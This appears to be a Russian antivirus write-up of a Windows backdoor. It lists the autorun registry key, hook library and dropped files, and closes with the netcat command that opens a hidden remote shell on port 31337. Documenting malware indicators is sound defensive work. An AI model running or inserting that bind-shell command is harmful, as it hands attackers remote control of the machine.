Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Update Services' = '<SYSTEM32>\ldservice.exe'
- Библиотека-обработчик для всех процессов: <SYSTEM32>\hkservice.dll
- <Текущая директория>\hkservice.dll
- <Текущая директория>\update.exe
- <Текущая директория>\nc.exe
- <Текущая директория>\whservice.dll
- <Текущая директория>\hpservice.dll
- <SYSTEM32>\update.exe
- <SYSTEM32>\nc.exe
- <SYSTEM32>\hkservice.dll
- <SYSTEM32>\whservice.dll
- <SYSTEM32>\hpservice.dll
- <SYSTEM32>\vis32.sys
- <Текущая директория>\hkservice.dll
- <Текущая директория>\whservice.dll
- <Текущая директория>\hpservice.dll
- <Текущая директория>\update.exe
- <Текущая директория>\nc.exe
- <SYSTEM32>\nc.exe
- <SYSTEM32>\hkservice.dll
- <SYSTEM32>\whservice.dll
- <SYSTEM32>\hpservice.dll
- <Текущая директория>\update.exe
- <Текущая директория>\nc.exe
- <Текущая директория>\hkservice.dll
- <Текущая директория>\whservice.dll
- <Текущая директория>\hpservice.dll
- '<SYSTEM32>\update.exe'
- '<SYSTEM32>\nc.exe' -L -d -e <SYSTEM32>\cmd.exe -p31337